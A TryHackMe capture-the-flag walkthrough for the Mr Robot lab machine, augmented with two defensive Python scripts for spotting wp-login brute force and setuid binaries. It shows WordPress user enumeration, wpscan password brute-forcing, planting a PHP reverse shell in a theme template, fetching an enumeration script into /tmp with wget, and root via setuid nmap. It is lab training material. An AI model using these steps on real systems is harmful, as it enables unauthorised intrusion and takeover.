TryHackMe Mr Robot CTF Walkthrough

This is my walkthrough for Mr-Robot

About TryHackMe

TryHackMe is an online platform that teaches Cybersecurity through hands-on virtual labs for beginners and experts.

About Mr Robot machine

Mr Robot is a virtual machine meant for beginners/intermediate infosec users. The objective of this challenge is to find 3 hidden keys located on the machine and get a root shell.

Scanning

Nmap

nmap 10.10.104.75 -sCV -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-13 10:34 WAT
Nmap scan report for 10.10.104.75
Host is up (0.18s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03

Enumeration

The open ports I focused on enumerating:

80/tcp
443/tcp

Web server port 80

On visiting the web page I found a website with an animation that references the Mr Robot TV series. The animation ends on a screen that resembles a Linux terminal with a blinking cursor.


The first thing I do when enumerating a web page is to check robots.txt.
In /robots.txt I found an interesting wordlist and a key file:

fsocity.dic and key-1-of-3.txt

Requesting key-1-of-3.txt in the URL gave me the 1st key:
073403c8a58a1f80d943455fb30724b9

I downloaded the “fsocity.dic” wordlist file for later use.

The wordlist has about 858160 lines, and many of the words are duplicated, so I sorted and deduplicated it into a new file (the original command redirected into a file named "sort", which clobbers nothing useful but does not produce the intended output):
sort -u fsocity.dic > fsocity-sorted.dic

After looking around and not finding anything else useful on the site, I decided to use Gobuster to enumerate the web directories.

Web Directory Enumeration

gobuster -u http://10.10.104.75 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -f -s 302,307,204,301,403

Gobuster gave me more directories, and the directory list shows that the website runs on WordPress.


WordPress Enumeration

I started enumerating the WordPress pages but could not find anything interesting, so I jumped to the login page /wp-login.

I tried logging in with the default credentials admin:admin and admin:password, but the login attempts failed. After a long time enumerating usernames, I found Elliot to be a valid user (taken from the Mr Robot television series character Elliot Alderson).

When I entered a wrong username I got "invalid user" and wrong password.

When I entered elliot I got valid user but wrong password.


Remember the wordlist I downloaded earlier: I used it to brute-force the password of the user elliot.

Bruteforcing user (elliot)

Using wpscan and the wordlist I found earlier, I got the login creds:

wpscan --url http://10.10.104.75/ -U elliot -P ~/Downloads/fsocity.dic

Elliot
ER28-0652
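From the defender's side, the username-enumeration attempts and the wpscan run above look like a burst of POST requests to wp-login.php from a single address. The following Python script is an added example, not part of the original write-up: it parses constructed Apache combined-format log lines and flags any source IP whose wp-login.php POSTs exceed a threshold inside a sliding one-minute window (the IPs, timestamps and threshold are constructed).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log format; the request field is split into method/path/protocol.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def wp_login_bursts(lines, threshold=10, window=timedelta(minutes=1)):
    """Return {ip: peak_count} for sources whose POSTs to wp-login.php exceed
    `threshold` inside any sliding window of length `window`."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            per_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:  # slide the window's left edge forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged

# Constructed sample log: 10.0.0.5 sends a POST every 2 s (a wpscan-style run),
# 10.0.0.9 is one legitimate login that succeeds with a 302 redirect.
SAMPLE_LOG = [
    f'10.0.0.5 - - [13/May/2020:10:40:{s:02d} +0100] "POST /wp-login.php HTTP/1.1" 200 3517'
    for s in range(0, 24, 2)
] + [
    '10.0.0.9 - - [13/May/2020:10:41:05 +0100] "GET /wp-login.php HTTP/1.1" 200 2816',
    '10.0.0.9 - - [13/May/2020:10:41:20 +0100] "POST /wp-login.php HTTP/1.1" 302 0',
]
```

Running wp_login_bursts(SAMPLE_LOG) flags only 10.0.0.5; feed it real access-log lines (one per list element) to use it against a live server.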


Reverse shell

I was able to log into wp-admin using the creds I found.

Using the WordPress admin privilege that the user "elliot" has, we can get a reverse shell:

WordPress: Reverse Shell

Steps for getting a reverse shell through WordPress:

  1. Go to Appearance > Editor > 404 Template and replace the PHP code with a PHP reverse shell. You can get it here: http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  2. Edit the following lines of php-reverse-shell.php with your local IP and reverse shell port 443:
     $ip = '127.0.0.1'; // CHANGE THIS
     $port = 1234; // CHANGE THIS
  3. Update the script (save).
  4. Start an ncat listener on your system on the same port specified in the script (443):
  5. nc -lvp 443
  6. Visit the /404 error page to trigger the reverse shell: http://10.10.104.75/404.php

I got a limited shell as daemon:

Spawn a TTY Shell

I upgraded my shell to a TTY shell, which lets me interact with it properly:

python3 -c 'import pty; pty.spawn("/bin/sh")'

export TERM=xterm


The daemon shell does not have the privilege to access all directories and files, but it can navigate parts of the file system. I moved to the /home/ directory and found another directory for the user robot. The robot directory has 2 files.

One is the 2nd key; the other is an MD5 password hash for the user robot.

Daemon does not have read permission for key-2-of-3.txt, so I can only read that key as robot. However, I do have read permission for the password.raw-md5 file, so I cat it and got robot's MD5 password hash. I cracked it on https://crackstation.net/ and obtained the password for the user robot.

User Robot

Using the password I obtained from the hash, I successfully logged in as robot and got the 2nd flag:
su robot and input the password


Root Shell

The first thing I do when enumerating a machine for a root shell is check what I can run using sudo -l.
I tried sudo -l with no luck: I can't run any sudo command.

Privilege Escalation Script

Using a Python HTTP server I transferred lse.sh, a Linux privilege escalation enumeration script, to the machine.

Steps I used for that:

  1. On my machine, I cd into the directory where the lse.sh script is and run python -m SimpleHTTPServer 8000 to start the Python server.
  2. On the Mr Robot machine, I cd into the /tmp directory and run wget http://10.*.*.*:8000/lse.sh (my attacking machine's IP on port 8000).
  3. chmod +x lse.sh
  4. Run ./lse.sh

After enumerating with lse.sh, the results showed nmap with the SUID bit set on the machine, which is interesting.

Checking GTFOBins shows how to leverage nmap to get root.

I ran the following commands and got a root shell:

  • nmap --interactive
  • !sh
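The root shell above comes from a single misconfiguration: a setuid-root nmap. As an added example (not part of the original write-up or of lse.sh), this Python script does the defender's version of that check: it walks a directory tree for setuid regular files and triages them against a constructed, non-exhaustive list of binaries known to offer shell escapes, so an administrator can strip the bit (chmod u-s) or compare the rest against a baseline.

```python
import os
import stat

# Setuid binaries for which a GTFOBins-style shell escape yields a root shell
# (nmap --interactive is the one used on this box). Constructed, non-exhaustive sample.
RISKY_SUID_NAMES = {"nmap", "vim", "find", "bash", "python", "perl", "less"}


def find_suid(root):
    """Walk `root` and return the sorted paths of regular files carrying the
    setuid bit. lstat is used so symlinks are not followed; entries that
    cannot be stat'ed (permission denied, vanished files) are skipped."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def classify_suid(paths, risky=RISKY_SUID_NAMES):
    """Split setuid paths into (known shell-escape binaries, everything else)
    so the first group is reviewed and has the bit removed (chmod u-s) first."""
    flagged = [p for p in paths if os.path.basename(p) in risky]
    other = [p for p in paths if os.path.basename(p) not in risky]
    return flagged, other


if __name__ == "__main__":
    # Equivalent of `find / -perm -4000 -type f`, plus the triage step.
    flagged, other = classify_suid(find_suid("/"))
    for p in flagged:
        print(f"REVIEW (shell escape known): {p}")
    print(f"{len(other)} other setuid binaries; compare against your baseline")
```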


As root, I can move into any directory or run any command without restrictions.

I moved to the /root/ directory and obtained the 3rd key.

This is the end.

Thanks for reading this write-up. Stay tuned and follow me on Twitter to receive updates on more write-ups and thoughts on information security concepts.
